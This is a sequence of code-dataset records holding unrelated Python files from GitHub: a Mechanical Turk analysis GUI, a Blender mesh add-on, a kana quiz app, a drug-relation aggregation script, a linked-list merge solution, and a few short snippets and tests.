*res_upper[0])\n f_lower = ansatz_curve(x, *res_lower[0])\n print(\"res_upper:\", res_upper[0])\n print(\"res_lower:\", res_lower[0])\n\n pyplot.figure(2)\n pyplot.plot(list_upper, \"o\", label=\"Upper bound data\")\n pyplot.plot(list_lower, \"+\", label=\"Lower bound data\")\n pyplot.plot(\n f_upper,\n label=\"Fitted upper bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}\".format(\n res_upper[0][0], res_upper[0][1], res_upper[0][2]\n ),\n )\n pyplot.plot(\n f_lower,\n label=\"Fitted lower bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}\".format(\n res_lower[0][0], res_lower[0][1], res_lower[0][2]\n ),\n )\n pyplot.legend()\n pyplot.suptitle(\"Curve fit method\")\n pyplot.show()\n\n else:\n tmp = dict(dict_answer)\n for i in dict_answer:\n if tmp[i][0] == 0:\n # print(i)\n del tmp[i]\n dict_answer = tmp\n for i in dict_answer:\n # print(i)\n dict_answer[i][1] = list(\n map(lambda x: x / dict_answer[i][0], dict_answer[i][1])\n )\n\n mean_result = open(\n prefix + \"Submitted_result/mean_result\" + wave_number + \".txt\", \"w\"\n )\n mean_result.write(json.dumps(dict_answer)) # use `json.loads` to do the reverse\n mean_result.close()\n\n analyse_gambling()\n\n\ndef analyse_gambling():\n answer = json.loads(\n open(prefix + \"Submitted_result/mean_result1\" + \".txt\", \"r\").read()\n )\n\n for i in range(2, int(wave_number) + 1):\n tmp = json.loads(\n open(prefix + \"Submitted_result/mean_result\" + str(i) + \".txt\", \"r\").read()\n )\n diff = set(answer) - set(tmp)\n for i in diff:\n del answer[i]\n for key, value in tmp.items():\n answer[key][1] = (\n answer[key][1] + value[1]\n ) # concat the previous capital with the following\n\n # print(answer)\n # for i in answer:\n # 
print(i)\n tmp = []\n for key, value in answer.items():\n tmp.append(\n [\n (1 - (1 / (n + 1)) * (np.log(s) / np.log(27))) * np.log2(27)\n for n, s in enumerate(answer[key][1])\n ]\n )\n\n print(len(tmp))\n\n list_plot = tmp[0]\n for i in range(1, len(tmp)):\n list_plot = list(map(operator.add, list_plot, tmp[i]))\n\n list_plot = list(map(lambda x: x / len(tmp), list_plot))\n print(list_plot)\n pyplot.plot(list_plot)\n # pyplot.suptitle(\"Entropy rate variation (Cover & King)\")\n pyplot.xlabel(\"Number of character\")\n pyplot.ylabel(\"Entropy rate(bits/character)\")\n # x = np.arange(1,len(list_plot)+1)\n # res = op.curve_fit(ansatz_curve,x,np.array(list_plot))\n # print(res)\n # f = ansatz_curve(x,*res[0])\n # pyplot.plot(f,label='Fitted upper bound: A={:5.3f}, beta={:5.3f}, h={:5.3f}'.format(res[0][0], res[0][1], res[0][2]))\n pyplot.show()\n\n\ndef func(variable, x, y):\n \"\"\"function to be minimized\"\"\"\n return ansatz_least(variable, x) - y\n\n\ndef ansatz_least(variable, x):\n return variable[0] * x ** (variable[1] - 1) + variable[2]\n\n\ndef ansatz_curve(x, A, beta, h):\n return A * x ** (beta - 1) + h\n\n\nif __name__ == \"__main__\":\n # endpoint_url = \"https://mturk-requester-sandbox.us-east-1.amazonaws.com\"\n endpoint_url = \"https://mturk-requester.us-east-1.amazonaws.com\"\n\n print(\"You are using endpoint_url= \", endpoint_url)\n\n # Connecting to the account\n mturk = boto3.client(\n \"mturk\",\n aws_access_key_id=\"XXXXXXX\",\n aws_secret_access_key=\"XXXXXXXXXXX\",\n region_name=\"us-east-1\",\n endpoint_url=endpoint_url,\n )\n #'https://mturk-requester.us-east-1.amazonaws.com' -> to publish on the official site\n # \"https://mturk-requester-sandbox.us-east-1.amazonaws.com\" -> to test before publishing\n\n # Choose what kind of test we want: simple, hard, gambling\n\n window = Tk()\n window.title(\"Choose type of test\")\n\n button = Button(\n window,\n text=\"simple\",\n command=lambda: choose_test(\"simple\", window),\n compound=BOTTOM,\n height=5,\n width=15,\n )\n button.pack(side=LEFT)\n\n button2 = Button(\n window,\n text=\"hard\",\n command=lambda: choose_test(\"hard\", window),\n compound=BOTTOM,\n height=5,\n width=15,\n )\n button2.pack(side=LEFT)\n\n button3 = Button(\n window,\n text=\"Gambling wave 1\",\n command=lambda: choose_test(\"gambling\", window),\n compound=BOTTOM,\n height=5,\n width=15,\n )\n button3.pack(side=LEFT)\n\n button3 = Button(\n window,\n text=\"Gambling other wave\",\n command=lambda: choose_test(\"gambling\", window, 2),\n compound=BOTTOM,\n height=5,\n width=15,\n )\n button3.pack(side=LEFT)\n\n window.mainloop()\n\n if test == \"simple\":\n prefix = \"simple_test/\"\n question = open(\"index_simple.html\", \"r\").read()\n\n elif test == \"hard\":\n prefix = \"hard_test/\"\n question = open(\"index_hard.html\", \"r\").read()\n\n else:\n prefix = \"gambling_test/\"\n if is_First_wave == 1:\n question = open(\n \"index_gambling1.html\", \"r\"\n ).read() # HTML to render when it's the first wave\n wave_number = str(1)\n else:\n question = open(\"index_gambling2.html\", \"r\").read()\n wave_number = open(prefix + \"wave_number_file.txt\", \"r\").read()\n\n question = (\n '\\\n \\n 450 \"\n )\n\n window = Tk()\n window.title(\"Main window\")\n im = Image.open(\"plus.png\").resize((100, 100))\n render = ImageTk.PhotoImage(im)\n\n button = Button(\n window,\n text=\"Create a HIT\",\n command=lambda: add_window(window),\n compound=BOTTOM,\n height=5,\n width=10,\n ) # ,image=render)\n button.pack(side=LEFT)\n\n # button2 = 
Button(window,text=\"Delete a HIT\",command=lambda:add_window(window),compound=BOTTOM)#,height=255,width=255)#,image=render)\n # button2.pack(side=LEFT)\n\n button3 = Button(\n window,\n text=\"Retrieve results\",\n command=lambda: result_window(window),\n compound=BOTTOM,\n height=5,\n width=10,\n ) # ,image=render)\n button3.pack(side=LEFT)\n\n window.mainloop()\n\n # how to retrieve answer:\n # a=mturk.list_assignments_for_hit(HITId=\"HITid\")\n # a['Assignments'][0]['Answer'] Perhaps [1] or other if there are more than 1 assigment\n","repo_name":"RenGeng/Mechanical-Turk","sub_path":"MT/analyseV2.py","file_name":"analyseV2.py","file_ext":"py","file_size_in_byte":30990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70269266494","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nbl_info = {\n \"name\": \"Add Wetted Mesh\",\n \"author\": \"freejack\",\n \"version\": (0, 2, 1),\n \"blender\": (2, 5, 8),\n \"api\": 37699,\n \"location\": \"View3D > Tool Shelf > Wetted Mesh Panel\",\n \"description\": \"Adds separated fluid, dry and wetted mesh for selected pair.\",\n \"warning\": \"\",\n \"wiki_url\": \"http://wiki.blender.org/index.php/Extensions:2.5/Py/\"\\\n \"Scripts/Mesh/Wetted_Mesh\",\n \"tracker_url\": \"http://projects.blender.org/tracker/index.php?\"\\\n \"func=detail&aid=27156\",\n \"category\": \"Mesh\"}\n\nimport bpy\nimport collections\nimport math\n\n### Tool Panel ###\nclass VIEW3D_PT_tools_WettedMesh(bpy.types.Panel):\n '''Wetted Mesh Tool Panel'''\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'TOOLS'\n bl_label = 'Wetted Mesh'\n bl_context = 'objectmode'\n\n def draw(self, context):\n layout = self.layout\n col = layout.column(align=True)\n slcnt = len(context.selected_objects)\n\n if slcnt != 2:\n col.label(text = 'Select two mesh objects')\n col.label(text = 'to generate separated')\n col.label(text = 'fluid, dry and wetted')\n col.label(text = 'meshes.')\n else:\n (solid, fluid) = getSelectedPair(context)\n col.label(text = 'solid = '+solid.name)\n col.label(text = 'fluid = '+fluid.name)\n col.operator('mesh.primitive_wetted_mesh_add', text='Generate Meshes')\n\n### Operator ###\nclass AddWettedMesh(bpy.types.Operator):\n '''Add wetted mesh for selected mesh pair'''\n bl_idname = \"mesh.primitive_wetted_mesh_add\"\n bl_label = \"Add Wetted Mesh\"\n bl_options = {'REGISTER', 'UNDO'}\n statusMessage = ''\n\n def draw(self, context):\n layout = self.layout\n col = layout.column(align=True)\n col.label(text = self.statusMessage)\n\n def execute(self, context):\n # make sure a pair of objects is selected\n if len(context.selected_objects) != 2:\n # should not happen if called from tool panel\n self.report({'WARNING'}, \"no mesh pair selected, operation cancelled\")\n 
return {'CANCELLED'}\n\n print(\"add_wetted_mesh begin\")\n \n # super-selected object is solid, other object is fluid\n (solid, fluid) = getSelectedPair(context)\n print(\" solid = \"+solid.name)\n print(\" fluid = \"+fluid.name)\n \n # make a copy of fluid object, convert to mesh if required\n print(\" copy fluid\")\n bpy.ops.object.select_all(action='DESELECT')\n fluid.select = True\n context.scene.objects.active = fluid\n bpy.ops.object.duplicate()\n bpy.ops.object.convert(target='MESH', keep_original=False)\n bpy.ops.object.transform_apply(location=True, rotation=True, scale=True)\n fluidCopy = context.object\n \n # substract solid from fluidCopy\n print(\" bool: fluidCopy DIFFERENCE solid\")\n bpy.ops.object.modifier_add(type='BOOLEAN')\n bop = fluidCopy.modifiers.items()[0]\n bop[1].operation = 'DIFFERENCE'\n bop[1].object = solid\n bpy.ops.object.modifier_apply(apply_as='DATA', modifier=bop[0])\n fluidMinusSolid = fluidCopy\n fluidMinusSolid.name = \"fluidMinusSolid\"\n \n # make a second copy of fluid object\n print(\" copy fluid\")\n bpy.ops.object.select_all(action='DESELECT')\n fluid.select = True\n context.scene.objects.active = fluid\n bpy.ops.object.duplicate()\n bpy.ops.object.convert(target='MESH', keep_original=False)\n bpy.ops.object.transform_apply(location=True, rotation=True, scale=True)\n fluidCopy = context.object\n \n # make union from fluidCopy and solid\n print(\" bool: fluidCopy UNION solid\")\n bpy.ops.object.modifier_add(type='BOOLEAN')\n bop = fluidCopy.modifiers.items()[0]\n bop[1].operation = 'UNION'\n bop[1].object = solid\n bpy.ops.object.modifier_apply(apply_as='DATA', modifier=bop[0])\n fluidUnionSolid = fluidCopy\n fluidUnionSolid.name = \"fluidUnionSolid\"\n \n # index meshes\n print(\" KDTree index fluidMinusSolid\")\n fluidMinusSolidKDT = KDTree(3, fluidMinusSolid.data.vertices)\n print(\" KDTree index fluidUnionSolid\")\n fluidUnionSolidKDT = KDTree(3, fluidUnionSolid.data.vertices)\n kdtrees = (fluidMinusSolidKDT, fluidUnionSolidKDT)\n \n # build mesh face sets\n faceDict = { }\n vertDict = { }\n \n print(\" processing fluidMinusSolid faces\")\n cacheDict = { }\n setFMSfaces = set()\n numFaces = len(fluidUnionSolid.data.faces)\n i = 0\n for f in fluidMinusSolid.data.faces:\n if i % 500 == 0:\n print(\" \", i, \" / \", numFaces)\n i += 1\n fuid = unifiedFaceId(kdtrees, f, fluidMinusSolid.data.vertices, \\\n faceDict, vertDict, cacheDict)\n setFMSfaces.add(fuid)\n \n print(\" processing fluidUnionSolid faces\")\n cacheDict = { }\n setFUSfaces = set()\n numFaces = len(fluidUnionSolid.data.faces)\n i = 0\n for f in fluidUnionSolid.data.faces:\n if i % 500 == 0:\n print(\" \", i, \" / \", numFaces)\n i += 1\n fuid = unifiedFaceId(kdtrees, f, fluidUnionSolid.data.vertices, \\\n faceDict, vertDict, cacheDict)\n setFUSfaces.add(fuid)\n \n # remove boolean helpers\n print(\" delete helper objects\")\n bpy.ops.object.select_all(action='DESELECT')\n fluidUnionSolid.select = True\n fluidMinusSolid.select = True\n bpy.ops.object.delete()\n\n # wetted = FMS - FUS\n print(\" set operation FMS diff FUS\")\n setWetFaces = setFMSfaces.difference(setFUSfaces)\n print(\" build wetted mesh\")\n verts, faces = buildMesh(setWetFaces, faceDict, vertDict)\n print(\" create wetted mesh\")\n wetted = createMesh(\"Wetted\", verts, faces)\n\n # fluid = FMS x FUS\n print(\" set operation FMS intersect FUS\")\n setFluidFaces = setFMSfaces.intersection(setFUSfaces)\n print(\" build fluid mesh\")\n verts, faces = buildMesh(setFluidFaces, faceDict, vertDict)\n print(\" create 
fluid mesh\")\n fluid = createMesh(\"Fluid\", verts, faces)\n \n # solid = FUS - FMS\n print(\" set operation FUS diff FMS\")\n setSolidFaces = setFUSfaces.difference(setFMSfaces)\n print(\" build solid mesh\")\n verts, faces = buildMesh(setSolidFaces, faceDict, vertDict)\n print(\" create solid mesh\")\n solid = createMesh(\"Solid\", verts, faces)\n \n # parent wetted mesh\n print(\" parent mesh\")\n bpy.ops.object.add(type='EMPTY')\n wettedMesh = context.object\n solid.select = True\n fluid.select = True\n wetted.select = True\n wettedMesh.select = True\n bpy.ops.object.parent_set(type='OBJECT')\n wettedMesh.name = 'WettedMesh'\n \n print(\"add_wetted_mesh done\")\n self.statusMessage = 'created '+wettedMesh.name\n\n return {'FINISHED'}\n\n\n### Registration ###\ndef register():\n bpy.utils.register_class(VIEW3D_PT_tools_WettedMesh)\n bpy.utils.register_class(AddWettedMesh)\n\n\ndef unregister():\n bpy.utils.unregister_class(VIEW3D_PT_tools_WettedMesh)\n bpy.utils.unregister_class(AddWettedMesh)\n\nif __name__ == \"__main__\":\n register()\n\n\n#\n# KD tree (used to create a geometric index of mesh vertices)\n#\n\ndef distance(a, b):\n return (a-b).length\n\nNode = collections.namedtuple(\"Node\", 'point axis label left right')\n\nclass KDTree(object):\n \"\"\"A tree for nearest neighbor search in a k-dimensional space.\n\n For information about the implementation, see\n http://en.wikipedia.org/wiki/Kd-tree\n\n Usage:\n objects is an iterable of (co, index) tuples (so MeshVertex is useable)\n k is the number of dimensions (=3)\n \n t = KDTree(k, objects)\n point, label, distance = t.nearest_neighbor(destination)\n \"\"\"\n\n def __init__(self, k, objects=[]):\n\n def build_tree(objects, axis=0):\n\n if not objects:\n return None\n\n objects.sort(key=lambda o: o.co[axis])\n median_idx = len(objects) // 2\n median_point = objects[median_idx].co\n median_label = objects[median_idx].index\n\n next_axis = (axis + 1) % k\n return Node(median_point, axis, median_label,\n build_tree(objects[:median_idx], next_axis),\n build_tree(objects[median_idx + 1:], next_axis))\n\n self.root = build_tree(list(objects))\n self.size = len(objects)\n\n\n def nearest_neighbor(self, destination):\n\n best = [None, None, float('inf')]\n # state of search: best point found, its label,\n # lowest distance\n\n def recursive_search(here):\n\n if here is None:\n return\n point, axis, label, left, right = here\n\n here_sd = distance(point, destination)\n if here_sd < best[2]:\n best[:] = point, label, here_sd\n\n diff = destination[axis] - point[axis]\n close, away = (left, right) if diff <= 0 else (right, left)\n\n recursive_search(close)\n if math.fabs(diff) < best[2]:\n recursive_search(away)\n\n recursive_search(self.root)\n return best[0], best[1], best[2]\n\n\n#\n# helper functions\n#\n\n# get super-selected object and other object from selected pair\ndef getSelectedPair(context):\n objA = context.object\n objB = context.selected_objects[0]\n if objA == objB:\n objB = context.selected_objects[1]\n return (objA, objB)\n\n# get a unified vertex id for given coordinates\ndef unifiedVertexId(kdtrees, location, vertDict):\n eps = 0.0001\n offset = 0\n for t in kdtrees:\n co, index, d = t.nearest_neighbor(location)\n if d < eps:\n uvid = offset + index\n if uvid not in vertDict:\n vertDict[uvid] = co\n return uvid\n offset += t.size\n return -1\n\n# get a unified face id tuple\n# Stores the ordered face id tuple in faceDict\n# and the used coordinates for vertex id in vertDict.\n# cacheDict caches the unified vertex id 
(lookup in kdtree is expensive).\n# For each mesh (where the face belongs to) a separate cacheDict is expected.\ndef unifiedFaceId(kdtrees, face, vertices, faceDict, vertDict, cacheDict):\n fids = [ ]\n for v in face.vertices:\n uvid = cacheDict.get(v)\n if uvid == None:\n uvid = unifiedVertexId(kdtrees, vertices[v].co, vertDict)\n cacheDict[v] = uvid\n fids.append(uvid)\n ofids = tuple(fids)\n fids.sort()\n fuid = tuple(fids)\n if fuid not in faceDict:\n faceDict[fuid] = ofids\n return fuid\n\n# build vertex and face array from unified face sets\ndef buildMesh(unifiedFaceSet, faceDict, vertDict):\n verts = [ ]\n nextV = 0\n myV = { }\n faces = [ ]\n for uf in unifiedFaceSet:\n of = faceDict[uf]\n myf = [ ]\n for uV in of:\n v = myV.get(uV)\n if v == None:\n v = nextV\n myV[uV] = nextV\n verts.append(vertDict[uV])\n nextV += 1\n myf.append(v)\n faces.append(myf)\n return verts, faces\n\n# create mesh object and link to scene\ndef createMesh(name, verts, faces):\n me = bpy.data.meshes.new(name+\"Mesh\")\n ob = bpy.data.objects.new(name, me)\n ob.show_name = True\n bpy.context.scene.objects.link(ob)\n me.from_pydata(verts, [], faces)\n me.update(calc_edges=True)\n return ob\n","repo_name":"BSVino/Blender","sub_path":"release/scripts/addons_contrib/wetted_mesh.py","file_name":"wetted_mesh.py","file_ext":"py","file_size_in_byte":12599,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"78"} +{"seq_id":"71050288571","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\npath = \"../input/\"\n\nprint('load train...')\ntrain_df = pd.read_csv(path+\"train.csv\",usecols=[ 'click_time'])\nprint('load test...')\ntest_df = pd.read_csv(path+\"test.csv\", usecols=['click_time'])\n\ntrain_df.click_time.str[11:13].value_counts().sort_index()\ntest_df.click_time.str[11:13].value_counts().sort_index()\ntrain_df['hour'] = pd.to_datetime(train_df.click_time).dt.hour.astype('uint8')\ntrain_df = train_df[(train_df.hour == 4)|(train_df.hour == 5)|(train_df.hour == 9)|(train_df.hour == 10)|(train_df.hour == 13)|(train_df.hour == 14)]","repo_name":"aorursy/new-nb-1","sub_path":"baomengjiao_less-data-and-higher-score.py","file_name":"baomengjiao_less-data-and-higher-score.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7795108323","text":"import unittest\nimport contribute\nfrom subprocess import check_output\n\n\nclass TestContribute(unittest.TestCase):\n\n def test_arguments(self):\n args = contribute.arguments(['-nw'])\n self.assertTrue(args.no_weekends)\n self.assertEqual(args.max_commits, 10)\n self.assertTrue(1 <= contribute.contributions_per_day(args) <= 20)\n\n def test_contributions_per_day(self):\n args = contribute.arguments(['-nw'])\n self.assertTrue(1 <= contribute.contributions_per_day(args) <= 20)\n\n def test_commits(self):\n contribute.NUM = 11 # limiting the number only for unittesting\n contribute.main(['-nw',\n '--user_name=sampleusername',\n '--user_email=your-username@users.noreply.github.com',\n '-mc=12',\n '-fr=82',\n '-db=10',\n '-da=15'])\n self.assertTrue(1 <= int(check_output(\n ['git',\n 'rev-list',\n '--count',\n 'HEAD']\n ).decode('utf-8')) <= 20*(10 + 15))\n","repo_name":"Shpota/github-activity-generator","sub_path":"test_contribute.py","file_name":"test_contribute.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":905,"dataset":"github-code","pt":"78"} +{"seq_id":"26882702595","text":"import sys\r\nimport random\r\nfrom PyQt5.QtWidgets import QApplication, QMessageBox, QMainWindow, QLabel, QPushButton, QGridLayout, QWidget, QLineEdit\r\nfrom PyQt5.QtCore import Qt, pyqtSlot\r\nfrom PyQt5.QtGui import QFont\r\n\r\n#Global Variables\r\nHIRAGANA = ['わ','ら','や','ま','は','な','た','さ','か','あ','り','み','ひ','に','ち','し','き','い'\r\n ,'る','ゆ','む','ふ','ぬ','つ','す','く','う','ん','れ','め','へ','ね','て','せ','け','え'\r\n ,'を','ろ','よ','も','ほ','の','と','そ','こ','お','ぱ','ば','だ','ざ','が','ぴ','び','ぢ','じ','ぎ'\r\n ,'ぷ','ぶ','づ','ず','ぐ','ぺ','べ','で','ぜ','げ','ぽ','ぼ','ど','ぞ','ご']\r\n\r\nKATAKANA = ['ワ','ラ','ヤ','マ','ハ','ナ','タ','サ','カ','ア','リ','ミ','ヒ','ニ','チ','シ','キ','イ'\r\n ,'ル','ユ','ム','フ','ヌ','ツ','ス','ク','ウ','ン','レ','メ','ヘ','ネ','テ','セ','ケ','エ'\r\n ,'ヲ','ロ','ヨ','モ','ホ','ノ','ト','ソ','コ','オ','パ','バ','ダ','ザ','ガ','ピ','ビ','ヂ','ジ','ギ'\r\n ,'プ','ブ','ヅ','ズ','グ','ペ','ベ','デ','ゼ','ゲ','ポ','ボ','ド','ゾ','ゴ']\r\n\r\nSOUNDS = ['wa','ra','ya','ma','ha','na','ta','sa','ka','a','ri','mi','hi','ni','chi','shi','ki','i'\r\n ,'ru','yu','mu','fu/hu','nu','tsu','su','ku','u','n','re','me','he','ne','te','se','ke','e'\r\n ,'wo','ro','yo','mo','ho','no','to','so','ko','o','pa','ba','da','za','ga','pi','bi','dzi','ji','gi'\r\n 
,'pu','bu','dzu','zu','gu','pe','be','de','ze','ge','po','bo','do','zo','go']\r\n\r\n\r\n\r\n\r\nclass JapaneseLesson(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setWindowTitle(\"Learn Japanese!! - こにちわ!!\")\r\n self.setGeometry(1500,500,400,200)\r\n self.hiragana = HIRAGANA\r\n self.katakana = KATAKANA\r\n self.sounds = SOUNDS\r\n self.counter = 0\r\n self.correct = 0\r\n self.incorrect = 0\r\n\r\n\r\n\r\n #Create Hiragana / Katakana label\r\n self.index = random.randint(0, len(self.hiragana) - 1)\r\n self.japanese_label = QLabel(self.hiragana[self.index], self)\r\n print(self.sounds[self.index])\r\n self.japanese_label.setStyleSheet(\"border: 1px solid black;\")\r\n self.japanese_label.setFont(QFont('Arial', 24))\r\n self.japanese_label.setAlignment(Qt.AlignCenter)\r\n\r\n #Track Correct and Incorrect scores\r\n self.correct_label = QLabel(\"Correct: \" + str(self.correct), self)\r\n self.correct_label.setFont(QFont('Arial', 12))\r\n \r\n self.incorrect_label = QLabel(\"Incorrect: \" + str(self.incorrect), self)\r\n self.incorrect_label.setFont(QFont('Arial', 12))\r\n\r\n\r\n #Create Text Box\r\n self.textbox = QLineEdit(self)\r\n\r\n #Create Button\r\n self.button = QPushButton('Show Answer', self)\r\n self.button.setFont(QFont('Arial', 11))\r\n\r\n #Connect button to function on_click\r\n self.button.clicked.connect(self.on_click)\r\n\r\n layout = QGridLayout()\r\n layout.addWidget(self.correct_label, 0, 0)\r\n layout.addWidget(self.incorrect_label, 1, 0)\r\n layout.addWidget(self.japanese_label, 0, 1)\r\n layout.addWidget(self.textbox, 1, 1)\r\n layout.addWidget(self.button, 2, 1)\r\n\r\n central_widget = QWidget(self)\r\n central_widget.setLayout(layout)\r\n self.setCentralWidget(central_widget)\r\n\r\n def update_labels(self):\r\n self.correct_label.setText(f\"Correct: {str(self.correct)}\")\r\n self.incorrect_label.setText(f\"Incorrect: {str(self.incorrect)}\")\r\n\r\n def on_click(self):\r\n textboxValue = self.textbox.text()\r\n \r\n #Check user input\r\n if textboxValue.lower() == self.sounds[self.index]: \r\n self.japanese_label.setStyleSheet(\"background-color: lightgreen; border: 1px solid black;\")\r\n QMessageBox.question(self, 'Correct!', \"You're Right!\", QMessageBox.Ok)\r\n self.textbox.setText(\"\")\r\n self.japanese_label.setStyleSheet(\"border: 1px solid black;\")\r\n self.correct += 1\r\n self.counter += 1\r\n self.change_character()\r\n\r\n elif textboxValue.lower() != self.sounds[self.index] and textboxValue != \"\":\r\n self.japanese_label.setStyleSheet(\"background-color: lightcoral; border: 1px solid black;\")\r\n QMessageBox.question(self, \"Wrong!\", f\"You got it wrong you ding dong! 
The correct answer was '{self.sounds[self.index]}'\", QMessageBox.Ok)\r\n self.textbox.setText(\"\")\r\n self.japanese_label.setStyleSheet(\"border: 1px solid black;\")\r\n self.incorrect += 1\r\n self.counter += 1\r\n self.change_character()\r\n else:\r\n self.japanese_label.setStyleSheet(\"background-color: aqua; border: 1px solid black;\")\r\n QMessageBox.information(self,\"Invalid Input\", \"Please enter a valid sound.\", QMessageBox.Ok)\r\n self.japanese_label.setStyleSheet(\"border: 1px solid black;\")\r\n\r\n self.update_labels()\r\n\r\n\r\n def change_character(self):\r\n #Update Japanese character after each round, decide if new character will be Hiragana or Katakana\r\n character_set = random.randint(0,1)\r\n self.index = random.randint(0, len(self.hiragana) - 1)\r\n \r\n if character_set == 1:\r\n self.japanese_label.setText(self.katakana[self.index])\r\n else:\r\n self.japanese_label.setText(self.hiragana[self.index])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n window = JapaneseLesson()\r\n window.show()\r\n sys.exit(app.exec_())","repo_name":"DavidR2134/JapaneseQT","sub_path":"JapaneseQT.py","file_name":"JapaneseQT.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38100373943","text":"import argparse\nfrom collections import defaultdict\nimport jsonlines\nfrom tqdm import tqdm\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--extracted-relations-file', type=str, required=False, default=\"/Users/vijay/Downloads/extracted_drugs_distant_supervision_large_multi_sentences_per_doc.jsonl\")\nparser.add_argument('--min-frequency', type=int, required=False, default=20)\nparser.add_argument('--label-threshold', type=int, required=False, default=0.6)\n\n\ndef return_relations_meeting_frequency(relation_counts, min_freq):\n relations = []\n for r, freq in relation_counts.items():\n if freq >= min_freq:\n relations.append(list(r))\n return relations\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n relation_labels = {\"COMB\": defaultdict(int), \"POS\": defaultdict(int), \"NEG\": defaultdict(int), \"NO_COMB\": defaultdict(int)}\n for row in tqdm(jsonlines.open(args.extracted_relations_file)):\n drug_relation = tuple(row[\"drug_combination\"])\n pos_prob = row[\"relation_probabilities\"][\"POS\"]\n neg_prob = row[\"relation_probabilities\"][\"NEG\"]\n comb_prob = pos_prob + neg_prob + row[\"relation_probabilities\"][\"COMB\"]\n no_comb_prob = row[\"relation_probabilities\"][\"NO_COMB\"]\n if pos_prob > args.label_threshold:\n relation_labels[\"POS\"][drug_relation] += 1\n if neg_prob > args.label_threshold:\n relation_labels[\"NEG\"][drug_relation] += 1\n if comb_prob > args.label_threshold:\n relation_labels[\"COMB\"][drug_relation] += 1\n if no_comb_prob > args.label_threshold:\n relation_labels[\"NO_COMB\"][drug_relation] += 1\n \n positive_relations = return_relations_meeting_frequency(relation_labels[\"POS\"], args.min_frequency)\n negative_relations = return_relations_meeting_frequency(relation_labels[\"NEG\"], args.min_frequency)\n no_comb_relations = return_relations_meeting_frequency(relation_labels[\"NO_COMB\"], args.min_frequency*10)\n\n breakpoint()\n\n with open(\"positive_relations_20_thresh.json\", 'w') as outfile:\n positives_writer = jsonlines.Writer(outfile)\n positives_writer.write_all(positive_relations)\n with open(\"negative_relations_20_thresh.json\", 'w') as outfile:\n negatives_writer = 
jsonlines.Writer(outfile)\n negatives_writer.write_all(negative_relations)\n \n","repo_name":"viswavi/drug-synergy-models-","sub_path":"scripts/aggregate_extracted_relations.py","file_name":"aggregate_extracted_relations.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7750943840","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 5 12:14:13 2019\n\n@author: kishan\n\"\"\"\n\n\nclass ListNode:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n\nclass Solution(object):\n def merge2List(self, l1, l2):\n dummyHead = ListNode(0)\n p = dummyHead\n while l1 is not None and l2 is not None:\n if l1.val <= l2.val:\n p.next = l1\n l1 = l1.next\n else:\n p.next = l2\n l2 = l2.next\n p = p.next\n if l1:\n p.next = l1\n if l2:\n p.next = l2\n return dummyHead.next\n\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n # Divide and conqure\n end = len(lists) - 1\n while end > 0:\n begin = 0\n while begin < end:\n lists[begin] = self.merge2List(lists[begin], lists[end])\n begin += 1\n end -= 1\n return lists[0]\n\n\ns = Solution()\nl1 = ListNode(1)\nl1.next = ListNode(2)\nl1.next.next = ListNode(3)\nl2 = ListNode(1)\nl2.next = ListNode(70)\nl2.next.next = ListNode(99)\nl3 = ListNode(4)\nl3.next = ListNode(10)\nl3.next.next = ListNode(15)\nk_sort = s.mergeKLists([l1, l2, l3])\ncurr = k_sort\nresult = []\nwhile curr:\n result.append(curr.val)\n curr = curr.next\nprint(result)\n","repo_name":"kishan3/leetcode_solutions","sub_path":"23_divide_conquer.py","file_name":"23_divide_conquer.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73649899771","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nfrom itertools import count, combinations\n\nimport numpy as np\nimport scipy as sp\nimport scipy.linalg as lin\nimport scipy.optimize as opt\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.lines as mlines\n\nfrom topology.spaces import CellComplex\nfrom topology.persistence import PairCells\nfrom topology.algorithm import max_cliques\n\n##------------------------------------------------------------------------------\n## Paramètres\nnsensors = 20 # Bombre de capteurs\nsigma_n = 0.01 # Variance du bruit de mesure\nnsampling = 50 # 